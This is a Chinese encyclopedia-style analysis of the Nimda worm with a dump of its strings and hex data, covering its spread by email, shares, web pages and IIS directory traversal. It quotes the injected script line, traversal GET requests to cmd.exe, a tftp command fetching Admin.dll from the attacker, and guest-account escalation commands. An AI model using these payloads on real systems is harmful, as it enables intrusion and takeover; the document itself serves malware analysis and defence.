:36179B60 35 35 63 2E 2E 2F 2E 2E 55c../..

:36179B68 25 32 35 35 63 2E 2E 00 %255c...

:36179B70 2F 6D 73 61 64 63 2F 2E /msadc/.

:36179B78 2E 25 32 35 35 63 2E 2E .%255c..

:36179B80 2F 2E 2E 25 32 35 35 63 /..%255c

:36179B88 2E 2E 2F 2E 2E 25 32 35 ../..%25

:36179B90 35 63 2F 2E 2E 25 63 31 5c/..%c1

:36179B98 25 31 63 2E 2E 2F 2E 2E %1c../..

:36179BA0 25 63 31 25 31 63 2E 2E %c1%1c..

:36179BA8 2F 2E 2E 25 63 31 25 31 /..%c1%1

:36179BB0 63 2E 2E 00 2F 73 63 72 c.../scr

:36179BB8 69 70 74 73 2F 2E 2E 25 ipts/..%

:36179BC0 63 31 25 31 63 2E 2E 00 c1%1c...

:36179BC8 2F 73 63 72 69 70 74 73 /scripts

:36179BD0 2F 2E 2E 25 63 30 25 32 /..%c0%2

:36179BD8 66 2E 2E 00 2F 73 63 72 f.../scr

:36179BE0 69 70 74 73 2F 2E 2E 25 ipts/..%

:36179BE8 63 30 25 61 66 2E 2E 00 c0%af...

:36179BF0 2F 73 63 72 69 70 74 73 /scripts

:36179BF8 2F 2E 2E 25 63 31 25 39 /..%c1%9

:36179C00 63 2E 2E 00 2F 73 63 72 c.../scr

:36179C08 69 70 74 73 2F 2E 2E 25 ipts/..%

:36179C10 25 33 35 25 36 33 2E 2E %35%63..

:36179C18 00 00 00 00 2F 73 63 72 ..../scr

:36179C20 69 70 74 73 2F 2E 2E 25 ipts/..%

:36179C28 25 33 35 63 2E 2E 00 00 %35c....

:36179C30 2F 73 63 72 69 70 74 73 /scripts

:36179C38 2F 2E 2E 25 32 35 25 33 /..%25%3

:36179C40 35 25 36 33 2E 2E 00 00 5%63....

:36179C48 2F 73 63 72 69 70 74 73 /scripts

:36179C50 2F 2E 2E 25 32 35 32 66 /..%252f

:36179C58 2E 2E 00 00 2F 72 6F 6F ..../roo

:36179C60 74 2E 65 78 65 3F 2F 63 t.exe?/c

:36179C68 2B 00 00 00 2F 77 69 6E +.../win

:36179C70 6E 74 2F 73 79 73 74 65 nt/syste

:36179C78 6D 33 32 2F 63 6D 64 2E m32/cmd.

:36179C80 65 78 65 3F 2F 63 2B 00 exe?/c+.

:36179C88 6E 65 74 25 25 32 30 75 net%%20u

:36179C90 73 65 25 25 32 30 5C 5C se%%20\\\\

:36179C98 25 73 5C 69 70 63 24 25 %s\\ipc$%

:36179CA0 25 32 30 22 22 25 25 32 %20""%%2

:36179CA8 30 2F 75 73 65 72 3A 22 0/user:"

:36179CB0 67 75 65 73 74 22 00 00 guest"..

:36179CB8 74 66 74 70 25 25 32 30 tftp%%20

:36179CC0 2D 69 25 25 32 30 25 73 -i%%20%s

:36179CC8 25 25 32 30 47 45 54 25 %%20GET%

:36179CD0 25 32 30 41 64 6D 69 6E %20Admin

:36179CD8 2E 64 6C 6C 25 25 32 30 .dll%%20

:36179CE0 00 00 00 00 41 64 6D 69 ....Admi

:36179CE8 6E 2E 64 6C 6C 00 00 00 n.dll...

:36179CF0 63 3A 5C 41 64 6D 69 6E c:\\Admin

:36179CF8 2E 64 6C 6C 00 00 00 00 .dll....

:36179D00 64 3A 5C 41 64 6D 69 6E d:\\Admin

:36179D08 2E 64 6C 6C 00 00 00 00 .dll....

:36179D10 65 3A 5C 41 64 6D 69 6E e:\\Admin

:36179D18 2E 64 6C 6C 00 00 00 00 .dll....

:36179D20 0D 0A 3C 68 74 6D 6C 3E ..<html>

:36179D28 3C 73 63 72 69 70 74 20 <script

:36179D30 6C 61 6E 67 75 61 67 65 language

:36179D38 3D 22 4A 61 76 61 53 63 ="JavaSc

:36179D40 72 69 70 74 22 3E 77 69 ript">wi

:36179D48 6E 64 6F 77 2E 6F 70 65 ndow.ope

:36179D50 6E 28 22 72 65 61 64 6D n("readm

:36179D58 65 2E 65 6D 6C 22 2C 20 e.eml",

:36179D60 6E 75 6C 6C 2C 20 22 72 null, "r

:36179D68 65 73 69 7A 61 62 6C 65 esizable

:36179D70 3D 6E 6F 2C 74 6F 70 3D =no,top=

:36179D78 36 30 30 30 2C 6C 65 66 6000,lef

:36179D80 74 3D 36 30 30 30 22 29 t=6000")

:36179D88 3C 2F 73 63 72 69 70 74 </script

:36179D90 3E 3C 2F 68 74 6D 6C 3E ></html>

:36179D98 00 00 00 00 2F 41 64 6D ..../Adm

:36179DA0 69 6E 2E 64 6C 6C 00 00 in.dll..

:36179DA8 64 69 72 00 47 45 54 20 dir.GET

:36179DB0 25 73 20 48 54 54 50 2F %s HTTP/

:36179DB8 31 2E 30 0D 0A 48 6F 73 1.0..Hos

:36179DC0 74 3A 20 77 77 77 0D 0A t: www..

:36179DC8 43 6F 6E 6E 6E 65 63 74 Connnect

:36179DD0 69 6F 6E 3A 20 63 6C 6F ion: clo

:36179DD8 73 65 0D 0A 0D 0A 00 00 se......

:36179DE0 63 3A 00 00 72 65 61 64 c:..read

:36179DE8 6D 65 00 00 6D 61 69 6E me..main

:36179DF0 00 00 00 00 69 6E 64 65 ....inde

:36179DF8 78 00 00 00 64 65 66 61 x...defa

:36179E00 75 6C 74 00 68 74 6D 6C ult.html

:36179E08 00 00 00 00 2E 61 73 70 .....asp

:36179E10 00 00 00 00 2E 68 74 6D .....htm

:36179E18 00 00 00 00 5C 72 65 61 ....\\rea

:36179E20 64 6D 65 2E 65 6D 6C 00 dme.eml.

:36179E28 2E 65 78 65 00 00 00 00 .exe....

:36179E30 6D 65 70 00 77 69 6E 7A mep.winz

:36179E38 69 70 33 32 2E 65 78 65 ip32.exe

:36179E40 00 00 00 00 72 69 63 68 ....rich

:36179E48 65 64 32 30 2E 64 6C 6C ed20.dll

:36179E50 00 00 00 00 2E 6E 77 73 .....nws

:36179E58 00 00 00 00 2E 65 6D 6C .....eml

:36179E60 00 00 00 00 2E 64 6F 63 .....doc

:36179E68 00 00 00 00 20 2E 65 78 .... .ex

:36179E70 65 00 00 00 64 6F 6E 74 e...dont

:36179E78 72 75 6E 6F 6C 64 00 00 runold..

:36179E80 69 6F 63 74 6C 73 6F 63 ioctlsoc

:36179E88 6B 65 74 00 67 65 74 68 ket.geth

:36179E90 6F 73 74 62 79 6E 61 6D ostbynam

:36179E98 65 00 00 00 67 65 74 68 e...geth

:36179EA0 6F 73 74 6E 61 6D 65 00 ostname.

:36179EA8 69 6E 65 74 5F 6E 74 6F inet_nto

:36179EB0 61 00 00 00 69 6E 65 74 a...inet

:36179EB8 5F 61 64 64 72 00 00 00 _addr...

:36179EC0 6E 74 6F 68 6C 00 00 00 ntohl...

:36179EC8 68 74 6F 6E 6C 00 00 00 htonl...

:36179ED0 6E 74 6F 68 73 00 00 00 ntohs...

:36179ED8 68 74 6F 6E 73 00 00 00 htons...

:36179EE0 63 6C 6F 73 65 73 6F 63 closesoc

:36179EE8 6B 65 74 00 73 65 6C 65 ket.sele

:36179EF0 63 74 00 00 73 65 6E 64 ct..send

:36179EF8 74 6F 00 00 73 65 6E 64 to..send

:36179F00 00 00 00 00 72 65 63 76 ....recv

:36179F08 66 72 6F 6D 00 00 00 00 from....

:36179F10 72 65 63 76 00 00 00 00 recv....

:36179F18 62 69 6E 64 00 00 00 00 bind....

:36179F20 63 6F 6E 6E 65 63 74 00 connect.

:36179F28 73 6F 63 6B 65 74 00 00 socket..

:36179F30 5F 5F 57 53 41 46 44 49 __WSAFDI

:36179F38 73 53 65 74 00 00 00 00 sSet....

:36179F40 57 53 41 43 6C 65 61 6E WSAClean

:36179F48 75 70 00 00 57 53 41 53 up..WSAS

:36179F50 74 61 72 74 75 70 00 00 tartup..

:36179F58 77 73 32 5F 33 32 2E 64 ws2_32.d

:36179F60 6C 6C 00 00 4D 41 50 49 ll..MAPI

:36179F68 4C 6F 67 6F 66 66 00 00 Logoff..

:36179F70 4D 41 50 49 53 65 6E 64 MAPISend

:36179F78 4D 61 69 6C 00 00 00 00 Mail....

:36179F80 4D 41 50 49 46 72 65 65 MAPIFree

:36179F88 42 75 66 66 65 72 00 00 Buffer..

:36179F90 4D 41 50 49 52 65 61 64 MAPIRead

:36179F98 4D 61 69 6C 00 00 00 00 Mail....

:36179FA0 4D 41 50 49 46 69 6E 64 MAPIFind

:36179FA8 4E 65 78 74 00 00 00 00 Next....

:36179FB0 4D 41 50 49 52 65 73 6F MAPIReso

:36179FB8 6C 76 65 4E 61 6D 65 00 lveName.

:36179FC0 4D 41 50 49 4C 6F 67 6F MAPILogo

:36179FC8 6E 00 00 00 4D 41 50 49 n...MAPI

:36179FD0 33 32 2E 44 4C 4C 00 00 32.DLL..

:36179FD8 57 4E 65 74 41 64 64 43 WNetAddC

:36179FE0 6F 6E 6E 65 63 74 69 6F onnectio

:36179FE8 6E 32 41 00 57 4E 65 74 n2A.WNet

:36179FF0 43 61 6E 63 65 6C 43 6F CancelCo

:36179FF8 6E 6E 65 63 74 69 6F 6E nnection

:3617A000 32 41 00 00 57 4E 65 74 2A..WNet

:3617A008 4F 70 65 6E 45 6E 75 6D OpenEnum

:3617A010 41 00 00 00 57 4E 65 74 A...WNet

:3617A018 45 6E 75 6D 52 65 73 6F EnumReso

:3617A020 75 72 63 65 41 00 00 00 urceA...

:3617A028 57 4E 65 74 43 6C 6F 73 WNetClos

:3617A030 65 45 6E 75 6D 00 00 00 eEnum...

:3617A038 4D 50 52 2E 44 4C 4C 00 MPR.DLL.

:3617A040 53 68 65 6C 6C 45 78 65 ShellExe

:3617A048 63 75 74 65 41 00 00 00 cuteA...

:3617A050 53 48 45 4C 4C 33 32 2E SHELL32.

:3617A058 44 4C 4C 00 52 65 67 69 DLL.Regi

:3617A060 73 74 65 72 53 65 72 76 sterServ

:3617A068 69 63 65 50 72 6F 63 65 iceProce

:3617A070 73 73 00 00 56 69 72 74 ss..Virt

:3617A078 75 61 6C 46 72 65 65 45 ualFreeE

:3617A080 78 00 00 00 56 69 72 74 x...Virt

:3617A088 75 61 6C 51 75 65 72 79 ualQuery

:3617A090 45 78 00 00 56 69 72 74 Ex..Virt

:3617A098 75 61 6C 41 6C 6C 6F 63 ualAlloc

:3617A0A0 45 78 00 00 56 69 72 74 Ex..Virt

:3617A0A8 75 61 6C 50 72 6F 74 65 ualProte

:3617A0B0 63 74 45 78 00 00 00 00 ctEx....

:3617A0B8 43 72 65 61 74 65 52 65 CreateRe

:3617A0C0 6D 6F 74 65 54 68 72 65 moteThre

:3617A0C8 61 64 00 00 48 65 61 70 ad..Heap

:3617A0D0 43 6F 6D 70 61 63 74 00 Compact.

:3617A0D8 48 65 61 70 46 72 65 65 HeapFree

:3617A0E0 00 00 00 00 48 65 61 70 ....Heap

:3617A0E8 41 6C 6C 6F 63 00 00 00 Alloc...

:3617A0F0 48 65 61 70 44 65 73 74 HeapDest

:3617A0F8 72 6F 79 00 48 65 61 70 roy.Heap

:3617A100 43 72 65 61 74 65 00 00 Create..

:3617A108 4B 45 52 4E 45 4C 33 32 KERNEL32

:3617A110 2E 44 4C 4C 00 00 00 00 .DLL....

:3617A118 53 4F 46 54 57 41 52 45 SOFTWARE

:3617A120 5C 4D 69 63 72 6F 73 6F \\Microso

:3617A128 66 74 5C 57 69 6E 64 6F ft\\Windo

:3617A130 77 73 5C 43 75 72 72 65 ws\\Curre

:3617A138 6E 74 56 65 72 73 69 6F ntVersio

:3617A140 6E 5C 41 70 70 20 50 61 n\\App Pa

:3617A148 74 68 73 5C 00 00 00 00 ths\\....

:3617A150 53 4F 46 54 57 41 52 45 SOFTWARE

:3617A158 5C 4D 69 63 72 6F 73 6F \\Microso

:3617A160 66 74 5C 57 69 6E 64 6F ft\\Windo

:3617A168 77 73 5C 43 75 72 72 65 ws\\Curre

:3617A170 6E 74 56 65 72 73 69 6F ntVersio

:3617A178 6E 5C 41 70 70 20 50 61 n\\App Pa

:3617A180 74 68 73 00 54 79 70 65 ths.Type

:3617A188 00 00 00 00 52 65 6D 61 ....Rema

:3617A190 72 6B 00 00 58 3A 5C 00 rk..X:\\.

:3617A198 53 4F 46 54 57 41 52 45 SOFTWARE

:3617A1A0 5C 4D 69 63 72 6F 73 6F \\Microso

:3617A1A8 66 74 5C 57 69 6E 64 6F ft\\Windo

:3617A1B0 77 73 5C 43 75 72 72 65 ws\\Curre

:3617A1B8 6E 74 56 65 72 73 69 6F ntVersio

:3617A1C0 6E 5C 4E 65 74 77 6F 72 n\etwor

:3617A1C8 6B 5C 4C 61 6E 4D 61 6E k\\LanMan

:3617A1D0 5C 58 24 00 50 61 72 6D \\X$.Parm

:3617A1D8 32 65 6E 63 00 00 00 00 2enc....

:3617A1E0 50 61 72 6D 31 65 6E 63 Parm1enc

:3617A1E8 00 00 00 00 46 6C 61 67 ....Flag

:3617A1F0 73 00 00 00 50 61 74 68 s...Path

:3617A1F8 00 00 00 00 53 4F 46 54 ....SOFT

:3617A200 57 41 52 45 5C 4D 69 63 WARE\\Mic

:3617A208 72 6F 73 6F 66 74 5C 57 rosoft\\W

:3617A210 69 6E 64 6F 77 73 5C 43 indows\\C

:3617A218 75 72 72 65 6E 74 56 65 urrentVe

:3617A220 72 73 69 6F 6E 5C 4E 65 rsion\e

:3617A228 74 77 6F 72 6B 5C 4C 61 twork\\La

:3617A230 6E 4D 61 6E 5C 00 00 00 nMan\\...

:3617A238 53 4F 46 54 57 41 52 45 SOFTWARE

:3617A240 5C 4D 69 63 72 6F 73 6F \\Microso

:3617A248 66 74 5C 57 69 6E 64 6F ft\\Windo

:3617A250 77 73 5C 43 75 72 72 65 ws\\Curre

:3617A258 6E 74 56 65 72 73 69 6F ntVersio

:3617A260 6E 5C 4E 65 74 77 6F 72 n\etwor

:3617A268 6B 5C 4C 61 6E 4D 61 6E k\\LanMan

:3617A270 00 00 00 00 53 59 53 54 ....SYST

:3617A278 45 4D 5C 43 75 72 72 65 EM\\Curre

:3617A280 6E 74 43 6F 6E 74 72 6F ntContro

:3617A288 6C 53 65 74 5C 53 65 72 lSet\\Ser

:3617A290 76 69 63 65 73 5C 6C 61 vices\\la

:3617A298 6E 6D 61 6E 73 65 72 76 nmanserv

:3617A2A0 65 72 5C 53 68 61 72 65 er\\Share

:3617A2A8 73 00 00 00 0D 0A 00 00 s.......

:3617A2B0 43 61 63 68 65 00 00 00 Cache...

:3617A2B8 53 6F 66 74 77 61 72 65 Software

:3617A2C0 5C 4D 69 63 72 6F 73 6F \\Microso

:3617A2C8 66 74 5C 57 69 6E 64 6F ft\\Windo

:3617A2D0 77 73 5C 43 75 72 72 65 ws\\Curre

:3617A2D8 6E 74 56 65 72 73 69 6F ntVersio

:3617A2E0 6E 5C 45 78 70 6C 6F 72 n\\Explor

:3617A2E8 65 72 5C 4D 61 70 4D 61 er\\MapMa

:3617A2F0 69 6C 00 00 51 55 49 54 il..QUIT

:3617A2F8 0D 0A 00 00 2E 0D 0A 00 ........

:3617A300 53 75 62 6A 65 63 74 3A Subject:

:3617A308 20 00 00 00 46 72 6F 6D ...From

:3617A310 3A 20 3C 00 44 41 54 41 : <.DATA

:3617A318 0D 0A 00 00 52 43 50 54 ....RCPT

词条	Nimda蠕虫病毒
释义	一种更具破坏力的恶意代码——Nimda worm 蠕虫开始在Internet上迅速蔓延传播。Nimda蠕虫病毒感染Windows 系列多种计算机系统，通过多种渠道传播，其传播速度之快、影响范围之广、破坏力之强都超过Code Red II。 Nimda蠕虫病毒介绍该病毒会通过email传播，当用户邮件的正文为空，似乎没有附件，实际上邮件中嵌入了病毒的执行代码，当用户用OUTLOOK、OUTLOOK EXPRESS（没有安装微软的补丁包的情况下）收邮件，在预览邮件时，病毒就已经不知不觉中执行了。病毒执行时会将自己复制到临时目录，再运行在临时目录中的副本。病毒还会在windows的system目录中生成load.exe文件，同时修改system.ini中的shell从shell=explorer.exe改为explorer.exe load.exe -dontrunold，使病毒在下次系统启动时仍然被激活。另外，在system目录下，病毒还会生成一个副本：riched20.dll。为了通过邮件将自己传播出去，病毒使用了MAPI函数读取用户的email并从中读取SMTP地址和email地址。另外，病毒运行时会利用ShellExcute执行系统中的一些命令如：NET.EXE、USER.EXE、SHARE.EXE等命令，将Guest用户添加到Guests、Administrators组（针对NT/2000/XP），并激活Guest用户。还将C盘根目录共享出来。一、影响系统 Windows95, 98,ME,NT 和2000 所有客户端和服务器系统二、传播方式 *　通过电子邮件从一个客户端感染另一个客户端 *　通过开放的网络共享从一个客户端感染另一个客户端 *　通过浏览被感染的网站从Web 服务器感染客户端 *　通过主动扫描或利用 “Microsoft IIS 4.0 / 5.0 directory traversal”的缺陷”从客户端感染Web 服务器 *　通过扫描 “Code Red” (IN-2001-09),和 “sadmind/IIS” (CA-2001-11) 留下的后门从客户端感染Web 服务器三、影响感染Nimda 病毒的机器会不断向Windows 的地址薄中的所有的邮件发送携带了Nimda病毒的邮件的拷贝。同样的，客户端机器会扫描有漏洞的IIS 服务器。Nimda 会搜寻以前的IIS蠕虫病毒留下的后门：Code Red II [IN-2001-09] 和 sadmind/IIS worm [CA-2001-11]；它也试图利用IIS Directory Traversal 漏洞 (VU #111677)。初步分析表明, 该病毒除了改变网页的目录以繁衍自身外没有其它破坏性的行为。但通过大量发送电子邮件和扫描网络可以导致网络的“拒绝服务”（DoS）。四、分析被感染的机器会发送一份Nimda病毒代码复本到任何在扫描中发现有漏洞的服务器。一旦在该服务器上运行，蠕虫就会遍历系统里的每一个目录（甚至包括所有通过共享文件可以读取得目录），然后会在磁盘里留下一份自身拷贝，取名为"README.EML"。一旦找到了含有web内容的目录（包含html或asp文件），下面Javascript代码段就会被添加到每一个跟web有关的文件中： <script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000") </script> 这段代码使得蠕虫可以进一步繁衍，通过浏览器或浏览网络文件感染到新的客户端。通过浏览器传播作为感染过程的一部分，Nimda 更改所有的含有web内容的文件（象 .htm, ,html, .asp 等文件）。这样，任何用户浏览该文件，不管是通过浏览器还是网络，就可能会下载一份该病毒。有些浏览器会自动的执行下载动作，感染正在浏览该网站的机器。通过文件系统感染 Nimda病毒生成大量的自身的复本，取名为README.EML, 写到该用户有可写权限的目录里。如果在另一台机器的用户通过网络共享选取病毒文件，并且设置了预览功能的话，蠕虫就会威胁到这台新的机器。系统记录对任何开放80/tcp端口的web服务器，Nimda蠕虫的扫描会生成下面的日志： GET /scripts/root.exe?/c+dir GET /MSADC/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /msadc/..%5c../..%5c../..%5c/..\\xc1\\x1c../..\\xc1\\x1c../..\\xc1\\ x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\\xc1\\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\\xc0/../winnt/system32/cmd.exe?/c+dir GET /scripts/..\\xc0\\xaf../winnt/system32/cmd.exe?/c+dir GET /scripts/..\\xc1\\x9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir 注：这个例子的前四行表明在试图连接Red Code II 留下的后门，例子的其余部分在试图利用Directory Traversal 漏洞。五、解决方案各单位必须高度重视抵抗本次病毒工作，迅速组织管理人员，密切监视网络运行状态，一旦发现此类蠕虫，迅速采取处理措施。为了让大家更好的研究和应对这种类型的病毒,特此提供病毒部分反汇编代码: 病毒数据串 " .exe" " -dontrunold" " -qusery9bnow" "% Privileged Time" "% Processor Time" "% User Time" "%ld %ld %ld" "%ld %ld" "%ls" "." ".." ".asp" ".doc" ".eml" ".exe" ".htm" ".nws" "/_mem_bin/..%255c../..%255c../..%255c.." "/_vti_bin/..%255c../..%255c../..%255c.." "/Admin.dll" "/c" "/d" "/MSADC" "/msadc/..%255c../..%255c../..%255c/..%c1%1c../" "/root.exe?/c+" "/scripts" "/scripts/..%%35%63.." "/scripts/..%%35c.." "/scripts/..%25%35%63.." "/scripts/..%252f.." "/scripts/..%255c.." "/scripts/..%c0%2f.." "/scripts/..%c0%af.." "/scripts/..%c1%1c.." "/scripts/..%c1%9c.." "/winnt/system32/cmd.exe?/c+" "\\" "\\." "\\\\" "\\\\%s" "\\load.exe" "\\mmc.exe" "\\readme.exe" "\\readme.eml" "\\riched20.dll" "\\system.ini" "\\wininit.ini" "__WSAFDIsSet" ">" "aabbcc" "admin.dll" "Admin.dll" "bind" "boot" "c:" "C:\\" "c:\\Admin.dll" "Cache" "closesocket" "connect" "Context Switches/sec" "Counter 009" "Counters" "CreateRemoteThread" "d:\\Admin.dll" "DATA" "default" "dir" "dontrunold" "e:\\Admin.dll" "Elapsed Time" "Exec Read Only" "Exec Read/Write" "Exec Write Copy" "Executable" "EXPLORER" "explorer.exe load.exe -dontrunold" "Flags" "From: <" "fsdhqherwqi2001" "GET %s HTTP/1.0" "gethostbyname" "gethostname" "HeapAlloc" "HeapCompact" "HeapCreate" "HeapDestroy" "HeapFree" "HELO " "Hidden" "HideFileExt" "html" "htonl" "htons" "ID Process" "ID Thread" "Image Space Exec Read Only" "Image Space Exec Read/Write" "Image Space Exec Write Copy" "Image Space Executable" "Image Space No Access" "Image Space Read Only" "Image Space Read/Write" "Image Space Write Copy" "Image" "index" "inet_addr" "inet_ntoa" "ioctlsocket" "KERNEL32.DLL" "Last Counter" "localgroup Administrators guest " "localgroup Guests guest /add" "MAIL FROM: <" "main" "MAPI32.DLL" "MAPIFindNext" "MAPIFreeBuffer" "MAPILogoff" "MAPILogon" "MAPIReadMail" "MAPIResolveName" "MAPISendMail" "Mapped Space Exec Read Only" "Mapped Space Exec Read/Write" "Mapped Space Exec Write Copy" "Mapped Space Executable" "Mapped Space No Access" "Mapped Space Read Only" "Mapped Space Read/Write" "Mapped Space Write Copy" "mep" "MIME-Version: 1.0" "MPR.DLL" "NameServer" "net" "No Access" "ntohl" "ntohs" "NUL=" "NULL" "octet" "open" "Page Faults/sec" "Parm1enc" "Parm2enc" "Path" "Personal" "Priority Base" "Priority Current" "Private Bytes" "Process Address Space" "Process" "QUIT" "qusery9bnow" "RCPT TO: <" "Read Only" "Read/Write" "readme" "recv" "recvfrom" "RegisterServiceProcess" "Remark" "Reserved Space Exec Read Only" "Reserved Space Exec Read/Write" "Reserved Space Exec Write Copy" "Reserved Space Executable" "Reserved Space No Access" "Reserved Space Read Only" "Reserved Space Read/Write" "Reserved Space Write Copy" "riched20.dll" "select" "send" "sendto" "share c$=c:\\" "Shell" "SHELL32.DLL" "ShellExecuteA" "ShowSuperHidden" "socket" "software\\microsoft\\windows nt\\currentversion\\p" "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App " "Software\\Microsoft\\Windows\\CurrentVersion\\Expl" "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\etw" "Start Address" "Subject: " "SYSTEM\\CurrentControlSet\\Services\\lanmanserver" "SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parame" "System\\CurrentControlSet\\Services\\VxD\\MSTCP" "tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20" "Thread Details" "Thread" "Type" "user guest """ "user guest /active" "user guest /add" "User PC" "Version" "Virtual Bytes Peak" "Virtual Bytes" "VirtualAllocEx" "VirtualFreeEx" "VirtualProtectEx" "VirtualQueryEx" "winzip32.exe" "WNetAddConnection2A" "WNetCancelConnection2A" "WNetCloseEnum" "WNetEnumResourceA" "WNetOpenEnumA" "Working Set Peak" "Working Set" "Write Copy" "ws2_32.dll" "WSACleanup" "WSAStartup" 代码数据 :36179000 00 00 00 00 00 00 00 00 ........ :36179008 00 00 00 00 00 00 00 00 ........ :36179010 2E 00 00 00 53 79 73 74 ....Syst :36179018 65 6D 5C 43 75 72 72 65 em\\Curre :36179020 6E 74 43 6F 6E 74 72 6F ntContro :36179028 6C 53 65 74 5C 53 65 72 lSet\\Ser :36179030 76 69 63 65 73 5C 56 78 vices\\Vx :36179038 44 5C 4D 53 54 43 50 00 D\\MSTCP. :36179040 4E 61 6D 65 53 65 72 76 NameServ :36179048 65 72 00 00 53 59 53 54 er..SYST :36179050 45 4D 5C 43 75 72 72 65 EM\\Curre :36179058 6E 74 43 6F 6E 74 72 6F ntContro :36179060 6C 53 65 74 5C 53 65 72 lSet\\Ser :36179068 76 69 63 65 73 5C 54 63 vices\\Tc :36179070 70 69 70 5C 50 61 72 61 pip\\Para :36179078 6D 65 74 65 72 73 5C 49 meters\\I :36179080 6E 74 65 72 66 61 63 65 nterface :36179088 73 5C 00 00 53 59 53 54 s\\..SYST :36179090 45 4D 5C 43 75 72 72 65 EM\\Curre :36179098 6E 74 43 6F 6E 74 72 6F ntContro :361790A0 6C 53 65 74 5C 53 65 72 lSet\\Ser :361790A8 76 69 63 65 73 5C 54 63 vices\\Tc :361790B0 70 69 70 5C 50 61 72 61 pip\\Para :361790B8 6D 65 74 65 72 73 5C 49 meters\\I :361790C0 6E 74 65 72 66 61 63 65 nterface :361790C8 73 00 00 00 43 6F 6E 63 s...Conc :361790D0 65 70 74 20 56 69 72 75 ept Viru :361790D8 73 28 43 56 29 20 56 2E s(CV) V. :361790E0 35 2C 20 43 6F 70 79 72 5, Copyr :361790E8 69 67 68 74 28 43 29 32 ight(C)2 :361790F0 30 30 31 20 20 52 2E 50 001 R.P :361790F8 2E 43 68 69 6E 61 00 00 .China.. :36179100 4D 49 4D 45 2D 56 65 72 MIME-Ver :36179108 73 69 6F 6E 3A 20 31 2E sion: 1. :36179110 30 0D 0A 43 6F 6E 74 65 0..Conte :36179118 6E 74 2D 54 79 70 65 3A nt-Type: :36179120 20 6D 75 6C 74 69 70 61 multipa :36179128 72 74 2F 72 65 6C 61 74 rt/relat :36179130 65 64 3B 0D 0A 09 74 79 ed;...ty :36179138 70 65 3D 22 6D 75 6C 74 pe="mult :36179140 69 70 61 72 74 2F 61 6C ipart/al :36179148 74 65 72 6E 61 74 69 76 ternativ :36179150 65 22 3B 0D 0A 09 62 6F e";...bo :36179158 75 6E 64 61 72 79 3D 22 undary=" :36179160 3D 3D 3D 3D 5F 41 42 43 ====_ABC :36179168 31 32 33 34 35 36 37 38 12345678 :36179170 39 30 44 45 46 5F 3D 3D 90DEF_== :36179178 3D 3D 22 0D 0A 58 2D 50 =="..X-P :36179180 72 69 6F 72 69 74 79 3A riority: :36179188 20 33 0D 0A 58 2D 4D 53 3..X-MS :36179190 4D 61 69 6C 2D 50 72 69 Mail-Pri :36179198 6F 72 69 74 79 3A 20 4E ority: N :361791A0 6F 72 6D 61 6C 0D 0A 58 ormal..X :361791A8 2D 55 6E 73 65 6E 74 3A -Unsent: :361791B0 20 31 0D 0A 0D 0A 2D 2D 1....-- :361791B8 3D 3D 3D 3D 5F 41 42 43 ====_ABC :361791C0 31 32 33 34 35 36 37 38 12345678 :361791C8 39 30 44 45 46 5F 3D 3D 90DEF_== :361791D0 3D 3D 0D 0A 43 6F 6E 74 ==..Cont :361791D8 65 6E 74 2D 54 79 70 65 ent-Type :361791E0 3A 20 6D 75 6C 74 69 70 : multip :361791E8 61 72 74 2F 61 6C 74 65 art/alte :361791F0 72 6E 61 74 69 76 65 3B rnative; :361791F8 0D 0A 09 62 6F 75 6E 64 ...bound :36179200 61 72 79 3D 22 3D 3D 3D ary="=== :36179208 3D 5F 41 42 43 30 39 38 =_ABC098 :36179210 37 36 35 34 33 32 31 44 7654321D :36179218 45 46 5F 3D 3D 3D 3D 22 EF_====" :36179220 0D 0A 0D 0A 2D 2D 3D 3D ....--== :36179228 3D 3D 5F 41 42 43 30 39 ==_ABC09 :36179230 38 37 36 35 34 33 32 31 87654321 :36179238 44 45 46 5F 3D 3D 3D 3D DEF_==== :36179240 0D 0A 43 6F 6E 74 65 6E ..Conten :36179248 74 2D 54 79 70 65 3A 20 t-Type: :36179250 74 65 78 74 2F 68 74 6D text/htm :36179258 6C 3B 0D 0A 09 63 68 61 l;...cha :36179260 72 73 65 74 3D 22 69 73 rset="is :36179268 6F 2D 38 38 35 39 2D 31 o-8859-1 :36179270 22 0D 0A 43 6F 6E 74 65 "..Conte :36179278 6E 74 2D 54 72 61 6E 73 nt-Trans :36179280 66 65 72 2D 45 6E 63 6F fer-Enco :36179288 64 69 6E 67 3A 20 71 75 ding: qu :36179290 6F 74 65 64 2D 70 72 69 oted-pri :36179298 6E 74 61 62 6C 65 0D 0A ntable.. :361792A0 0D 0A 0D 0A 3C 48 54 4D ....<HTM :361792A8 4C 3E 3C 48 45 41 44 3E L><HEAD> :361792B0 3C 2F 48 45 41 44 3E 3C </HEAD>< :361792B8 42 4F 44 59 20 62 67 43 BODY bgC :361792C0 6F 6C 6F 72 3D 33 44 23 olor=3D# :361792C8 66 66 66 66 66 66 3E 0D ffffff>. :361792D0 0A 3C 69 66 72 61 6D 65 .<iframe :361792D8 20 73 72 63 3D 33 44 63 src=3Dc :361792E0 69 64 3A 45 41 34 44 4D id:EA4DM :361792E8 47 42 50 39 70 20 68 65 GBP9p he :361792F0 69 67 68 74 3D 33 44 30 ight=3D0 :361792F8 20 77 69 64 74 68 3D 33 width=3 :36179300 44 30 3E 0D 0A 3C 2F 69 D0>..</i :36179308 66 72 61 6D 65 3E 3C 2F frame></ :36179310 42 4F 44 59 3E 3C 2F 48 BODY></H :36179318 54 4D 4C 3E 0D 0A 2D 2D TML>..-- :36179320 3D 3D 3D 3D 5F 41 42 43 ====_ABC :36179328 30 39 38 37 36 35 34 33 09876543 :36179330 32 31 44 45 46 5F 3D 